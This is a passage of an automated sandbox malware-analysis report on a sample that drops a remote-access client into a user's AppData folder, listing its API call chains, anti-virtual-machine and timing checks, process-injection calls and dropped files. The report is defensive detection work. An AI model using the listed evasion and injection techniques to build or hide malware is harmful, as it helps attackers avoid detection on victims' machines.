                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,11_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,11_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,11_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,11_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11024880
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,3_2_11029BB0
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110B86C0 Sleep,ExitProcess,3_2_110B86C0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110B86C0 Sleep,ExitProcess,11_2_110B86C0
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSystem information queried: FirmwareTableInformationJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSystem information queried: FirmwareTableInformationJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSystem information queried: FirmwareTableInformationJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSystem information queried: FirmwareTableInformationJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSystem information queried: FirmwareTableInformationJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSystem information queried: FirmwareTableInformationJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSystem information queried: FirmwareTableInformationJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeSystem information queried: FirmwareTableInformationJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: HKEY_LOCAL_MACHINE\SOFTWARE\WineJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeRDTSC instruction interceptor: First address: 4F9EF6 second address: 4D2D4B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 mov ebx, dword ptr [esp+04h] 0x00000007 lea ebx, dword ptr [ebx+6Ch] 0x0000000a xchg dword ptr [esp+04h], ebx 0x0000000e mov dword ptr [esp+04h], ebx 0x00000012 mov ebx, dword ptr [esp] 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 and eax, 00000001h 0x0000001e push ebx 0x0000001f mov ebx, dword ptr [esp+04h] 0x00000023 lea ebx, dword ptr [ebx+39h] 0x00000026 xchg dword ptr [esp+04h], ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e mov ebx, dword ptr [esp] 0x00000031 lea esp, dword ptr [esp+04h] 0x00000035 xchg eax, edx 0x00000036 xchg dword ptr [esp], eax 0x00000039 xchg eax, edx 0x0000003a lea esp, dword ptr [esp+04h] 0x0000003e xchg eax, esi 0x0000003f xchg dword ptr [esp], esi 0x00000042 xchg eax, esi 0x00000043 lea esp, dword ptr [esp+04h] 0x00000047 je 00007F1328455CABh 0x0000004d popfd 0x0000004e lea esi, dword ptr [esi] 0x00000050 je 00007F132852AD0Dh 0x00000056 jmp 00007F13285607C0h 0x0000005b pushfd 0x0000005c push ecx 0x0000005d mov ecx, dword ptr [esp+04h] 0x00000061 lea ecx, dword ptr [ecx+4Fh] 0x00000064 xchg dword ptr [esp+04h], ecx 0x00000068 mov dword ptr [esp+04h], ecx 0x0000006c mov ecx, dword ptr [esp] 0x0000006f lea esp, dword ptr [esp+04h] 0x00000073 xchg eax, edx 0x00000074 lea esp, dword ptr [esp-04h] 0x00000078 mov dword ptr [esp], edx 0x0000007b mov edx, eax 0x0000007d mov eax, dword ptr [esp] 0x00000080 xchg edi, edx 0x00000082 lea esp, dword ptr [esp-04h] 0x00000086 mov dword ptr [esp], edi 0x00000089 mov edi, edx 0x0000008b mov edx, dword ptr [esp] 0x0000008e rdtsc
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDateJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0045467A rdtsc 0_2_0045467A
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_02291C53 GetCurrentThread,GetCurrentThread,GetThreadPriority,GetCurrentThread,SetThreadPriority,GetCurrentProcessId,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,Thread32Next,Thread32First,GetCurrentProcessId,GetCurrentThreadId,Thread32Next,GetCurrentThread,CloseHandle,GetCurrentThread,SetThreadPriority,0_2_02291C53
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004507AE sgdt fword ptr [eax]0_2_004507AE
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeWindow / User API: threadDelayed 3944Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeWindow / User API: threadDelayed 5232Jump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SuportUpWin\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decisiongraph_3-104350
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decisiongraph_3-108450
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decisiongraph_3-108849
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decisiongraph_3-109129
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decisiongraph_3-109296
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_3-108589
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-104015
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeAPI coverage: 4.7 %
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeAPI coverage: 2.1 %
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe TID: 5992Thread sleep time: -986000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe TID: 5992Thread sleep time: -1308000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004093B9 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,GetLastError,0_2_004093B9
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0040DB4C GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,FindFirstFileW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0040DB4C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022AAFC7 FindFirstFileExW,0_2_022AAFC7
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,3_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,3_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,3_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,3_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF3EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF3EFE1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF40F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF40F84
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF3CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6CF3CA9B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF40B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF40B33
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF3C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6CF3C775
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF40702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF40702
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF07C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF07C6D
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF3FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF3FD86
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,11_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF3EFE1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF40F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF40F84
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,11_2_6CF3CA9B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF40B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF40B33
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,11_2_6CF3C775
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF40702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF40702
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF07C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF07C6D
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF3FD86
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,11_2_6CF3DF35
